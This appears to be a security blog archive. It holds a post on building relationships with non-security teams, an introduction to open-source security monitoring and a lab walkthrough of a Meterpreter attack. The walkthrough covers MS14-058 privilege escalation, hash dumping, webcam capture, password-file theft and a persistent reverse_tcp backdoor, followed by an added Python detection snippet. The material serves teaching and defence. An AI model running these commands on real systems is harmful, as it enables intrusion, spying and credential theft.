The Missing CISSP Domain

In the security world, the CISSP is the gold standard certification for information security professionals.  The exam is incredibly broad, covering a number of domains.  However, over the course of my career I’ve realized that there’s a key domain that’s missing.

Oh really, Eric?  And what might that domain be?

Securing relationships.

Huh?  Securing relationships?  What does that even mean, Eric?  Have you finally gone security-mad?

Ok, hear me out.  What I’m referring to specifically is developing and cultivating relationships with teams outside of security.  For a team often viewed as curmudgeonly, elitist, and an all-around roadblock to the business, it is imperative that significant effort is made reaching out and “securing relationships.”

A major function of security is performing risk assessments so that the business can make informed decisions.  In that sense, security is serving the business and should have a service-oriented mindset.  To that end, rather than simply saying no or objecting to a request, consider an alternative approach.  Patiently educate others on the risks of a given situation, suggest a secure solution that meets or beats expectations, and always go the extra mile to ensure that any given recommendation continues to be the optimal method.  Yes, it takes more time and effort and goes against our natural I-hate-everything-especially-people M.O. but the payoff will be more than worth it.  While the business won’t always do exactly what we want, folks will be more willing to engage and listen to us if we offer reasonable solutions versus the traditional high-and-mighty-security-rage-and-hate.

This is certainly easier if you’re naturally social to begin with.  And I know, we’re 1337 haxx0rs too busy saving the world to be bothered to look up from our computers.  But it turns out, if we leave our desks once in a while to say hello or smile and to casually discuss security in a real-world context with someone who may not be as knowledgeable, we might just find that people are more interested and willing to support security than we may think.  And ultimately, this leads to more security advocates, more support for our security (and career!) goals, and yes a more secure workplace.  Plus, you might even make a friend or two. 😛

I think security professionals often operate with a superiority complex.  We wrongly assume everyone knows and defaults to the “secure choice” and that anyone who doesn’t is “an idiot.”  We rant that we’re the last to be told and first to be blamed for anything and everything (well maybe that’s kinda true… :P).  But what are we doing to help this?  What makes us think that internalizing the frustration, becoming more snarky, and fitting the classic grumpy security guy/girl stereotype solves this?

The truth is, if we want people to appreciate security and what we do, we’ve got to return the favor and recognize that what others do is equally valuable and work with them to educate and demonstrate how security can positively impact their own work.  I honestly believe that most people want to be more secure, they just don’t know how.  Typically, people don’t make the “secure choice” simply because no one’s ever illustrated the risks and outlined recommendations in a way that’s understandable to them.  Ironically, people are intimidated to ask the security personnel (you know, the team paid to secure things all day) how they can help the company be more secure and it’s often a result of stereotypes that we as security professionals do little to change.

So I urge us to recognize our core strengths and use those to develop relationships.  Personally, I use humor and my love of teaching to help make security fun and less intimidating.  In my current position, through both effort and chance, I’ve had the opportunity to meet and work with a large part of the organization.  I’ve made the most of this by making it a point to develop friendly and strong relationships with teams outside security.  It has led to these same teams reporting possible security incidents, asking for security’s opinion before moving forward, and spreading the good security word to create a security-minded culture.  It seems obvious, but as with most things, it takes significant effort.

Speaking of security-minded cultures, a great way to secure relationships is through awareness trainings.  In a future post, I’ll share my thoughts on the importance of security awareness trainings and how to deliver these in an effective manner.


OSM: Open Security Monitoring


I’ve spent most of my career defending environments of all sizes.  What I’ve found is that the job of a defender is much less flashy, and far more thankless, than that of an “ethical hacker.”  While there are volumes of articles, guides, and talks on penetration testing and the latest attacks, there isn’t much on defending or security monitoring.  With plenty of free tools and exploits for attackers (such as the venerable Kali Linux), there doesn’t seem to be as much excitement for building similar tools for defenders.  In fact, there’s a notion that in order to properly defend a network, you must spend thousands or even millions of dollars.

Enter “Open Security Monitoring”, or “OSM”, which I refer to as a system of integrated open source security tools working together to secure networks of all sizes and all budgets.  Why open source?  There are three specific advantages:

  • Cost: Open source security tools are freely available for anyone to download and install.  This makes the barrier to entry much lower for convincing management to implement these tools.
  • Transparency: The source code can be viewed and edited by anyone, making it clear how it works.  If it doesn’t do something you want it to do, you’re free to modify the code to fit your needs.  I’ve always found the best way to learn and understand something is to take it apart and look at how all the pieces work together.  It’s no different with security tools.
  • Quality: Just because it’s open source and “free”, doesn’t mean it’s a lesser tool than something costing thousands of dollars.  In fact, many are better than anything commercially available because they’re built and supported by a passionate community that isn’t looking to simply make the next big sale.

In this series, I will walk through key OSM components and the relevant tools I’ve used to defend real-world environments:

  • Intrusion Detection/Prevention System
  • Network Security Monitoring
  • Host Intelligence
  • Security Analytics

You could certainly achieve this without using open source tools, but the point here is that you can build a robust security monitoring architecture with limited financial resources.  And if you have some money to spend, open source security tools complement commercial systems well.  Each environment is unique and you’ll likely have a mix of open source and commercial products.

What’s Next

We’ve defined the concept of Open Security Monitoring and why there is a need for open source security tools.  Next, we’ll explore the first of four OSM components, intrusion detection/prevention systems.


Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post; now let’s play with some of its many functions.  Our Meterpreter session is currently running under the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to gain full control of the system.  In Windows, the highest-privileged account is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened ( -> at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Little Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can then be cracked offline, giving us, the Attacker, passwords to try on the Victim’s online accounts.

meterpreter > hashdump

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg


Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.


Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt

Back on our Attacker machine, we’ll set up a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine.  If all goes well, we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to
[*] Meterpreter session 7 opened ( -> at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!
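From the defender’s side, the persistence step leaves recognisable artifacts: a script dropped in a user’s AppData\Local\Temp, launched by a script host, and registered as a service with a random-looking name.  The following is an added detection example, not code from the original post: it runs a few heuristics over constructed “service installed” records.  The record layout and the cscript.exe launch are assumptions made for the example; only the service name and the .vbs path are taken from the persistence output above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample records modelled on the Windows System log "service installed" event
# (ID 7045), one per line.  Field layout and the cscript.exe launch are assumptions for this
# example; only the service name and the .vbs path come from the persistence output above.
SAMPLE_EVENTS = [
    "EventID=7045 ServiceName=wuauserv ImagePath=C:\\Windows\\system32\\svchost.exe -k netsvcs",
    "EventID=7045 ServiceName=dexYVTDwgSWcORt ImagePath=cscript.exe //B "
    "C:\\Users\\eric\\AppData\\Local\\Temp\\vkPiHmUdoG.vbs",
    "EventID=7045 ServiceName=Spooler ImagePath=C:\\Windows\\System32\\spoolsv.exe",
    "EventID=7036 ServiceName=Spooler ImagePath=",  # state change, not an install: ignored
]

RECORD_RE = re.compile(r"EventID=(\d+) ServiceName=(\S+) ImagePath=(.*)")
SCRIPT_HOST_RE = re.compile(r"\b(cscript|wscript|mshta|powershell)(\.exe)?\b", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|js|ps1|bat|cmd)\b", re.I)
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)

@dataclass
class Finding:
    service: str
    image_path: str
    reasons: list = field(default_factory=list)

def case_transitions(name: str) -> int:
    """Count upper/lower switches between adjacent letters; generated names switch constantly."""
    return sum(1 for a, b in zip(name, name[1:])
               if a.isalpha() and b.isalpha() and a.isupper() != b.isupper())

def assess_service_install(record: str):
    """Return a Finding for a 7045 record (reasons empty if benign), or None for other events."""
    m = RECORD_RE.match(record)
    if not m or m.group(1) != "7045":
        return None
    name, path = m.group(2), m.group(3)
    finding = Finding(name, path)
    if SCRIPT_HOST_RE.search(path):
        finding.reasons.append("script host used as the service binary")
    if SCRIPT_EXT_RE.search(path):
        finding.reasons.append("service image is a script file")
    if USER_TEMP_RE.search(path):
        finding.reasons.append("image lives under a user-writable Temp directory")
    if case_transitions(name) >= 4:
        finding.reasons.append("random-looking service name")
    return finding

def suspicious_services(records):
    # Keep only the installs that tripped at least one heuristic.
    return [f for f in map(assess_service_install, records) if f and f.reasons]
```

On a real host the same checks can be fed from the System event log or from a periodic service enumeration; the random-name heuristic is a supporting signal, so it only adds a reason rather than flagging on its own.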


Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and then created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.